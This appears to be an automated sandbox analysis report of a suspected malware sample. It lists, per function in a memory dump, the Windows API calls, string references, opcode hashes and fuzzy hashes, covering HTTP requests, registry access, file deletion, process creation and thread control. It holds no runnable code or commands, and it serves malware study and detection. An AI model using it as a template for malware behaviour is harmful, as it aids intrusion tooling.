Part of subcall function 00765701: lstrlen.KERNEL32(00000000,77D3EEF0,?,74715520,00000000,?,77D3EB70,0076C5F4,00000000,03F0C310), ref: 0076572C
Part of subcall function 00765701: lstrlen.KERNEL32(?,?,77D3EB70,0076C5F4,00000000,03F0C310), ref: 00765734
Part of subcall function 00765701: strcpy.NTDLL ref: 0076574B
Part of subcall function 00765701: lstrcat.KERNEL32(00000000,?), ref: 00765756
Part of subcall function 00765701: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,77D3EB70,0076C5F4,00000000,03F0C310), ref: 00765773

StrTrimA.SHLWAPI(00000000,007733F8,?,03F0C310), ref: 0076E7CC

Part of subcall function 00764D3D: lstrlen.KERNEL32(03F08498,74715520,77D3EEF0,00000000,0076C61F,00000000), ref: 00764D4D
Part of subcall function 00764D3D: lstrlen.KERNEL32(?), ref: 00764D55
Part of subcall function 00764D3D: lstrcpy.KERNEL32(00000000,03F08498), ref: 00764D69
Part of subcall function 00764D3D: lstrcat.KERNEL32(00000000,?), ref: 00764D74

lstrcpy.KERNEL32(00000000,?), ref: 0076E7E9
lstrcpy.KERNEL32(00000000,00000000), ref: 0076E7EF
lstrcat.KERNEL32(00000000,?), ref: 0076E7FB
lstrcat.KERNEL32(00000000,00000000), ref: 0076E7FF

Part of subcall function 00753C07: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,?,0076A46E,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000), ref: 00753CBA

HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 0076E847

Part of subcall function 007657B1: RtlEnterCriticalSection.NTDLL(03F0C2D0), ref: 007657BE
Part of subcall function 007657B1: RtlLeaveCriticalSection.NTDLL(03F0C2D0), ref: 00765817

HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0076E856
HeapFree.KERNEL32(00000000,00000000,?,03F0C310), ref: 0076E865
HeapFree.KERNEL32(00000000,00000000), ref: 0076E876
HeapFree.KERNEL32(00000000,?), ref: 0076E887

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$Free$wsprintf$CriticalSectionlstrcatlstrlen$lstrcpy$AllocateCountEnterLeavePerformanceQueryTickTrim$CounterFrequencyObjectSingleWait_aulldivstrcpy
String ID:
API String ID: 124692113-0
Opcode ID: e52e3b51f98c7fa3316ac714de2c8220e158907b888d2c433b187cb1ba59e825
Instruction ID: 6465a2d8fdcb28a7a83e8fd687336a3feeae9e646085389678c51a3979268b12
Opcode Fuzzy Hash: e52e3b51f98c7fa3316ac714de2c8220e158907b888d2c433b187cb1ba59e825
Instruction Fuzzy Hash: F281737154020AEFDF019FA8EC48F6A3BA9FB08394F048021F90DD6261DB79D995DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00760A13 Relevance: 38.9, APIs: 15, Strings: 7, Instructions: 389memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?,?), ref: 00760A75
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00760B11
lstrcpyn.KERNEL32(00000000,?,?), ref: 00760B26
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00760B41
StrChrA.SHLWAPI(?,00000020,?,00000000,00000000,?,00000000,?,?,?), ref: 00760C28
StrChrA.SHLWAPI(00000001,00000020), ref: 00760C39
lstrlen.KERNEL32(00000000), ref: 00760C4D
memmove.NTDLL(?,?,00000001), ref: 00760C5D
lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 00760C89
RtlAllocateHeap.NTDLL(00000000,?), ref: 00760CAF
memcpy.NTDLL(00000000,?,?), ref: 00760CC3
memcpy.NTDLL(?,?,?), ref: 00760CE3
HeapFree.KERNEL32(00000000,?), ref: 00760D1F
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00760DE5
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 00760E2D

Strings

PUT , xrefs: 00760A3F
GET , xrefs: 00760A38
GET , xrefs: 00760C15
OPTI, xrefs: 00760C1D
u"w, xrefs: 00760AA2
POST, xrefs: 00760A46
OPTI, xrefs: 00760A4D

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
String ID: GET $GET $OPTI$OPTI$POST$PUT $u"w
API String ID: 3227826163-2911589733
Opcode ID: 4b32aae2726bb91d665075f5eddc6d8b50f2c36215ad08454c025fe8373a22aa
Instruction ID: d24b903bef550a3f24ea71eb4fda44c461cefde7b7fca0653072b0fbc044ffc7
Opcode Fuzzy Hash: 4b32aae2726bb91d665075f5eddc6d8b50f2c36215ad08454c025fe8373a22aa
Instruction Fuzzy Hash: 9BE17A75A00205EFDB15DFA8CC88AAEBBB5FF04340F108559F91A9B261D778EE50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0076C431 Relevance: 33.2, APIs: 22, Instructions: 248memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 0076C465
wsprintfA.USER32 ref: 0076C4D3
wsprintfA.USER32 ref: 0076C519
wsprintfA.USER32 ref: 0076C53C
HeapFree.KERNEL32(00000000,00000000), ref: 0076C552
wsprintfA.USER32 ref: 0076C579
HeapFree.KERNEL32(00000000,?), ref: 0076C58A
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0076C5A4
RtlEnterCriticalSection.NTDLL(03F0C2D0), ref: 0076C5C5
RtlLeaveCriticalSection.NTDLL(03F0C2D0), ref: 0076C5E5

Part of subcall function 00765701: lstrlen.KERNEL32(00000000,77D3EEF0,?,74715520,00000000,?,77D3EB70,0076C5F4,00000000,03F0C310), ref: 0076572C
Part of subcall function 00765701: lstrlen.KERNEL32(?,?,77D3EB70,0076C5F4,00000000,03F0C310), ref: 00765734
Part of subcall function 00765701: strcpy.NTDLL ref: 0076574B
Part of subcall function 00765701: lstrcat.KERNEL32(00000000,?), ref: 00765756
Part of subcall function 00765701: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,77D3EB70,0076C5F4,00000000,03F0C310), ref: 00765773

StrTrimA.SHLWAPI(00000000,007733F8,00000000,03F0C310), ref: 0076C613

Part of subcall function 00764D3D: lstrlen.KERNEL32(03F08498,74715520,77D3EEF0,00000000,0076C61F,00000000), ref: 00764D4D
Part of subcall function 00764D3D: lstrlen.KERNEL32(?), ref: 00764D55
Part of subcall function 00764D3D: lstrcpy.KERNEL32(00000000,03F08498), ref: 00764D69
Part of subcall function 00764D3D: lstrcat.KERNEL32(00000000,?), ref: 00764D74

lstrcpy.KERNEL32(00000000,?), ref: 0076C636
lstrcpy.KERNEL32(00000000,00000000), ref: 0076C640
lstrcat.KERNEL32(00000000,?), ref: 0076C650
lstrcat.KERNEL32(00000000,00000000), ref: 0076C657
RtlEnterCriticalSection.NTDLL(03F0C2D0), ref: 0076C662
RtlLeaveCriticalSection.NTDLL(03F0C2D0), ref: 0076C67C

Part of subcall function 00763C1F: memcpy.NTDLL(00000000,?,00000010), ref: 00763C70
Part of subcall function 00763C1F: memcpy.NTDLL(00000000,?,?,00000010), ref: 00763D03

HeapFree.KERNEL32(00000000,?,00000001,03F0C310,?,?,?), ref: 0076C70F
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0076C724
HeapFree.KERNEL32(00000000,?,00000000,03F0C310), ref: 0076C732
HeapFree.KERNEL32(00000000,00000000), ref: 0076C744
HeapFree.KERNEL32(00000000,00000000), ref: 0076C74F

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$Free$CriticalSectionlstrcatlstrlenwsprintf$lstrcpy$AllocateEnterLeaveTrimmemcpy$strcpy
String ID:
API String ID: 283581948-0
Opcode ID: 838df51e321d5f95c9fabd7e41426df2cbfd59ef16ad022743656fa366c47c86
Instruction ID: 35f2f091fc4b3dbf21d698b94f9310403ba3ce0d441e496ba4bc6fcf06529a1b
Opcode Fuzzy Hash: 838df51e321d5f95c9fabd7e41426df2cbfd59ef16ad022743656fa366c47c86
Instruction Fuzzy Hash: EB91BD71100301AFDB42DF68DC88E2A7BE9FB88790F058429F94DD7261CB38E855DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0076AD05 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 186synchronizationstringthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0076AD2C
memcpy.NTDLL(?,?,00000010), ref: 0076AD4F
memset.NTDLL ref: 0076AD9B
lstrcpyn.KERNEL32(?,?,00000034), ref: 0076ADAF
GetLastError.KERNEL32 ref: 0076ADDD
GetLastError.KERNEL32 ref: 0076AE24
GetLastError.KERNEL32 ref: 0076AE43
WaitForSingleObject.KERNEL32(?,000927C0), ref: 0076AE7D
WaitForSingleObject.KERNEL32(?,00000000), ref: 0076AE8B
GetLastError.KERNEL32 ref: 0076AF0E
ReleaseMutex.KERNEL32(?), ref: 0076AF20
RtlExitUserThread.NTDLL(?), ref: 0076AF36

Strings

X&w, xrefs: 0076AEA9
4&w, xrefs: 0076AEC9
>&w, xrefs: 0076AEBF
l&w, xrefs: 0076AEE9
*&w, xrefs: 0076AD76
&w, xrefs: 0076AD5D

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
String ID: &w$*&w$4&w$>&w$X&w$l&w
API String ID: 4037736292-2279663439
Opcode ID: f5966082d5a2286fbc579283170b482361997de896c86df54aece13e371dae49
Instruction ID: dd9f11febfdaf31853a63737b11a37a13b85bd843df7b2e237a0662847051359
Opcode Fuzzy Hash: f5966082d5a2286fbc579283170b482361997de896c86df54aece13e371dae49
Instruction Fuzzy Hash: 76616871508301FFD3219F24DC49A6BB7E9BF84751F008A2EF99AA2190E7B9D944CF52

Uniqueness

Uniqueness Score: -1.00%

Function 0076E32A Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 161memorystringfileCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00000000), ref: 0076E341
lstrlen.KERNEL32(?,?,00000000), ref: 0076E348
RtlAllocateHeap.NTDLL(00000000,?), ref: 0076E35F
lstrcpy.KERNEL32(00000000,?), ref: 0076E370
lstrcat.KERNEL32(?,?), ref: 0076E38C
lstrcat.KERNEL32(?,?), ref: 0076E39D
RtlAllocateHeap.NTDLL(00000000,?), ref: 0076E3AE
RtlAllocateHeap.NTDLL(00000000,?), ref: 0076E44B
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 0076E484
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0076E49D
CloseHandle.KERNEL32(00000000,?,00000000), ref: 0076E4A7
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0076E4B7
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0076E4D0
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0076E4E0

Strings

A#w, xrefs: 0076E4BF
&#w, xrefs: 0076E3DF
K#w, xrefs: 0076E3EF
U#w, xrefs: 0076E428

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
String ID: &#w$A#w$K#w$U#w
API String ID: 333890978-4079140759
Opcode ID: 2f39282f3f04f87e58eaaf2520efce773fe23f93d4dccccba2adfe12bbb23dcc
Instruction ID: 2da7ccc3f24df9926820ae5a21857151b5acfef987507c20a23c50d304932ffc
Opcode Fuzzy Hash: 2f39282f3f04f87e58eaaf2520efce773fe23f93d4dccccba2adfe12bbb23dcc
Instruction Fuzzy Hash: 81517F76500148BFDB019FA4DC84CBE7BBDFB48394B058466FA1997120DA389E85DF64

Uniqueness

Uniqueness Score: -1.00%

Function 0075442D Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 258memorystringfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 00754442

Part of subcall function 00761577: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 007615C3
Part of subcall function 00761577: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 007615CF
Part of subcall function 00761577: memset.NTDLL ref: 00761617
Part of subcall function 00761577: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00761632
Part of subcall function 00761577: lstrlenW.KERNEL32(0000002C), ref: 0076166A
Part of subcall function 00761577: lstrlenW.KERNEL32(?), ref: 00761672
Part of subcall function 00761577: memset.NTDLL ref: 00761695
Part of subcall function 00761577: wcscpy.NTDLL ref: 007616A7

Part of subcall function 00761577: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 007616CD
Part of subcall function 00761577: RtlEnterCriticalSection.NTDLL(?), ref: 00761703
Part of subcall function 00761577: RtlLeaveCriticalSection.NTDLL(?), ref: 0076171F
Part of subcall function 00761577: FindNextFileW.KERNEL32(?,00000000), ref: 00761738
Part of subcall function 00761577: WaitForSingleObject.KERNEL32(00000000), ref: 0076174A
Part of subcall function 00761577: FindClose.KERNEL32(?), ref: 0076175F
Part of subcall function 00761577: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00761773
Part of subcall function 00761577: lstrlenW.KERNEL32(0000002C), ref: 00761795

RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 0075449E
memcpy.NTDLL(00000000,?,00000000), ref: 007544B1
lstrcpyW.KERNEL32(00000000,?), ref: 007544C8

Part of subcall function 00761577: FindNextFileW.KERNEL32(?,00000000), ref: 0076180B
Part of subcall function 00761577: WaitForSingleObject.KERNEL32(00000000), ref: 0076181D
Part of subcall function 00761577: FindClose.KERNEL32(?), ref: 00761838

HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 007544F3
RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 0075450B
HeapFree.KERNEL32(00000000,00000000), ref: 00754565
lstrlenW.KERNEL32(00000000,?), ref: 00754588
RtlAllocateHeap.NTDLL(00000000,?), ref: 0075459A
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 0075460E
HeapFree.KERNEL32(00000000,?), ref: 0075461E

Part of subcall function 00751C9B: lstrlen.KERNEL32(00000000,00000008,-00000007,?,?,0075E657,00000000,00000000,-00000007,00760969,-00000007,?,?), ref: 00751CAA
Part of subcall function 00751C9B: mbstowcs.NTDLL ref: 00751CC6

CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 00754647
lstrlenW.KERNEL32(00779834,?), ref: 007546C1
DeleteFileW.KERNEL32(?,?), ref: 007546EF
HeapFree.KERNEL32(00000000,?), ref: 007546FD
HeapFree.KERNEL32(00000000,?), ref: 0075471E

Strings

Z$w, xrefs: 00754519

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
String ID: Z$w
API String ID: 72361108-2716038989
Opcode ID: 5476da9d1a706ef2f8f74759de172780d1ab9362c3f1215ccc5e6c0a9297a673
Instruction ID: f742d7fa09ccf4912c0d481b6b400ebaa3c5e22157627f2d298fae46dd91708e
Opcode Fuzzy Hash: 5476da9d1a706ef2f8f74759de172780d1ab9362c3f1215ccc5e6c0a9297a673
Instruction Fuzzy Hash: 73918A71601219FFDB10DFA0DC8CDEA7BBDFB0A394B048415FA09C7221D6789A89CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0075D4F4 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 219memoryfilestringCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0075D510
RtlAllocateHeap.NTDLL(00000000,?), ref: 0075D52C
GetLastError.KERNEL32 ref: 0075D57B
HeapFree.KERNEL32(00000000,00000000), ref: 0075D591
RtlAllocateHeap.NTDLL(00000000,?), ref: 0075D5A5
GetLastError.KERNEL32 ref: 0075D5BF
GetLastError.KERNEL32 ref: 0075D5F2
HeapFree.KERNEL32(00000000,00000000), ref: 0075D610
lstrlenW.KERNEL32(00000000,?), ref: 0075D63C
RtlAllocateHeap.NTDLL(00000000,?), ref: 0075D651
DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 0075D725
HeapFree.KERNEL32(00000000,?), ref: 0075D734
WaitForSingleObject.KERNEL32(00000000), ref: 0075D749
HeapFree.KERNEL32(00000000,00000000), ref: 0075D75C
HeapFree.KERNEL32(00000000,?), ref: 0075D76E
RtlExitUserThread.NTDLL(?,?), ref: 0075D783

Strings

, xrefs: 0075D635

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
String ID:
API String ID: 3853681310-3916222277
Opcode ID: 02ab23cf187733f087e6f78f9474a6e7968427069c1d7a5276d57cec3aa5d6e7
Instruction ID: 17d1a00a9d428142916c3c87eba1ab04405a72bec445b5fb68fbc878ab54f86a
Opcode Fuzzy Hash: 02ab23cf187733f087e6f78f9474a6e7968427069c1d7a5276d57cec3aa5d6e7
Instruction Fuzzy Hash: 9E814471900209EFDB20DFA4DC88EBE7BB9FB09385F008469F50997120D7785E85DB65

Uniqueness

Uniqueness Score: -1.00%

Function 007647CE Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136timeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0076480B
OpenWaitableTimerA.KERNEL32(00100000,00000000,?), ref: 0076481F
CloseHandle.KERNEL32(00000000), ref: 0076494A

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

memset.NTDLL ref: 0076484B
GetLastError.KERNEL32(?,?,00000040), ref: 00764883

Strings

W, xrefs: 00764950
b&w, xrefs: 007648A2
0x%08X, xrefs: 007647E9

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: AllocateCloseErrorHandleHeapLastOpenTimerWaitablememsetwsprintf
String ID: 0x%08X$W$b&w
API String ID: 95801598-2516103396
Opcode ID: 69d3d9c1fc71e4e132585fa7541ddfa41a0ce2e49238fc67c1ffe54ed87fd27b
Instruction ID: 0737840cc59d98823a4599ac522dde9a2cd9a44fa384deb82e0c280423b83ca1
Opcode Fuzzy Hash: 69d3d9c1fc71e4e132585fa7541ddfa41a0ce2e49238fc67c1ffe54ed87fd27b
Instruction Fuzzy Hash: 75516DB1500709EFDB219F64CC45BAABBE8FF08354F108519F95AD7290D778EA44CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00763F6E Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 121processstringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00763F83

Part of subcall function 00751C9B: lstrlen.KERNEL32(00000000,00000008,-00000007,?,?,0075E657,00000000,00000000,-00000007,00760969,-00000007,?,?), ref: 00751CAA
Part of subcall function 00751C9B: mbstowcs.NTDLL ref: 00751CC6

lstrlenW.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 00763FBC
wcstombs.NTDLL ref: 00763FC6
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,?,00000000,?), ref: 00763FF7
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,8Au), ref: 00764023
TerminateProcess.KERNEL32(?,000003E5), ref: 00764039
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 0076404D
GetLastError.KERNEL32 ref: 00764051
GetExitCodeProcess.KERNEL32(?,00000001), ref: 00764071
CloseHandle.KERNEL32(?), ref: 00764080
CloseHandle.KERNEL32(?), ref: 00764085
GetLastError.KERNEL32 ref: 00764089

Strings

8Au, xrefs: 0076400A, 00764043
D, xrefs: 00763F97

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
String ID: 8Au$D
API String ID: 2463014471-2797139350
Opcode ID: 1d8266e217b2f83a6cd21b4d3c7fe4a04c57d7f4faed77b7a740e7a21012c58b
Instruction ID: 086abe8fa6c968dd632c1a0c22e9d770bc6e022df66fe11ae2de9daebb879192
Opcode Fuzzy Hash: 1d8266e217b2f83a6cd21b4d3c7fe4a04c57d7f4faed77b7a740e7a21012c58b
Instruction Fuzzy Hash: 67410871900228FFDB11EFA4CD899EEBBB9FB04344F208069EA06A6110D6395E45DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00756E5E Relevance: 24.1, APIs: 16, Instructions: 131memoryregistrythreadCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00756E80
RtlEnterCriticalSection.NTDLL(00000000), ref: 00756E9D
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 00756EED
DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00756EF7
GetLastError.KERNEL32 ref: 00756F01
HeapFree.KERNEL32(00000000,00000000), ref: 00756F12
HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00756F34
HeapFree.KERNEL32(00000000,?), ref: 00756F6B
RtlLeaveCriticalSection.NTDLL(00000000), ref: 00756F7F
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00756F88
SuspendThread.KERNEL32(?), ref: 00756F97
CreateEventA.KERNEL32(00778208,00000001,00000000), ref: 00756FAB
SetEvent.KERNEL32(00000000), ref: 00756FB8
CloseHandle.KERNEL32(00000000), ref: 00756FBF
Sleep.KERNEL32(000001F4), ref: 00756FD2
ResumeThread.KERNEL32(?), ref: 00756FF6

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
String ID:
API String ID: 1011176505-0
Opcode ID: 2b541cce659bdaeb05c2388709167998a5d3c9c46e7c71f26d414ad9e3fdee8b
Instruction ID: 40c843233102d4cbf9f7678f010974fe6b77fb22f9753a71041afb57a1433f0b
Opcode Fuzzy Hash: 2b541cce659bdaeb05c2388709167998a5d3c9c46e7c71f26d414ad9e3fdee8b
Instruction Fuzzy Hash: B1418072900109FFDB109FA4EC8C9ADBBB9FB04385B508069F909A3160DB795EC9DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00751D82 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

memset.NTDLL ref: 00751DB0
StrChrA.SHLWAPI(?,0000000D), ref: 00751DF6
StrChrA.SHLWAPI(?,0000000A), ref: 00751E03
StrChrA.SHLWAPI(?,0000007C), ref: 00751E2A
StrTrimA.SHLWAPI(?,00773FCC), ref: 00751E3F
StrChrA.SHLWAPI(?,0000003D), ref: 00751E48
StrTrimA.SHLWAPI(00000001,00773FCC), ref: 00751E5E
_strupr.NTDLL ref: 00751E65
StrTrimA.SHLWAPI(?,?), ref: 00751E72
memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 00751EBA
lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,00000000,00000000,?,?), ref: 00751ED9

Strings

;, xrefs: 00751E18
, xrefs: 00751E6A

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
String ID: $;
API String ID: 4019332941-73438061
Opcode ID: 11250a709f703705c52ffb288b1bd5596dc874d483c4c86e4f3d01af6a0a1ece
Instruction ID: 1c1b44ce570cd33e0bf0617fb80e0ed048614256386f3ade2d0ec6cdf1ed9997
Opcode Fuzzy Hash: 11250a709f703705c52ffb288b1bd5596dc874d483c4c86e4f3d01af6a0a1ece
Instruction Fuzzy Hash: 2E41B5715083069FD7119F28DC45BABBBE8EF48343F444819FC9997291DBB8D909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0075E258 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 308memorythreadCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0075E2D8
VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0075E2F7
GetLastError.KERNEL32 ref: 0075E4A8
GetLastError.KERNEL32 ref: 0075E52A
SwitchToThread.KERNEL32(?,?,?,?), ref: 0075E573
GetLastError.KERNEL32 ref: 0075E5C5
GetLastError.KERNEL32 ref: 0075E5D4
RtlEnterCriticalSection.NTDLL(?), ref: 0075E5E4
RtlLeaveCriticalSection.NTDLL(?), ref: 0075E5F5
RtlExitUserThread.NTDLL(?), ref: 0075E603

Strings

b&w, xrefs: 0075E2A5, 0075E31E, 0075E341
v&w, xrefs: 0075E421, 0075E43B, 0075E568

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorLast$AllocCriticalSectionThreadVirtual$EnterExitLeaveSwitchUser
String ID: b&w$v&w
API String ID: 1601105880-1775309686
Opcode ID: 757bc331d4d66047f2bbc6b4bdfc47491b0fbef97107c029357fc6f57ea8e7d7
Instruction ID: b3630b857dd5efc761eb6fe64815495cbdf7d038524e288805dfef1fe80f99a2
Opcode Fuzzy Hash: 757bc331d4d66047f2bbc6b4bdfc47491b0fbef97107c029357fc6f57ea8e7d7
Instruction Fuzzy Hash: B8C14C71500349EFDB249F61CD88AAA7BB9FF08345F108569F959D2160EBB8DE98CF10

Uniqueness

Uniqueness Score: -1.00%

Function 007634EC Relevance: 21.2, APIs: 14, Instructions: 224memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0075DCFB: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,00000001,00000000,00000000,?,74715520,00000000,?,?,?,0075508A,?), ref: 0075DD33
Part of subcall function 0075DCFB: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0075DD47
Part of subcall function 0075DCFB: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00000001,?,?,?,0075508A,?,?,?,?,?,00000001), ref: 0075DD61
Part of subcall function 0075DCFB: RegCloseKey.KERNEL32(?,?,?,?,0075508A,?,?,?,?,?,00000001), ref: 0075DD8B

HeapFree.KERNEL32(00000000,?,?,?,?,7476F710,00000000,00000000), ref: 00763533
RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 00763551
HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0076357D
HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 007635EC
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 007636AF
wsprintfA.USER32 ref: 007636CA
lstrlen.KERNEL32(00000000,00000000), ref: 007636D5
HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 007636EC
HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000000,00000000,?,?), ref: 0076370E
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00763729
wsprintfA.USER32 ref: 00763740
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0076374B

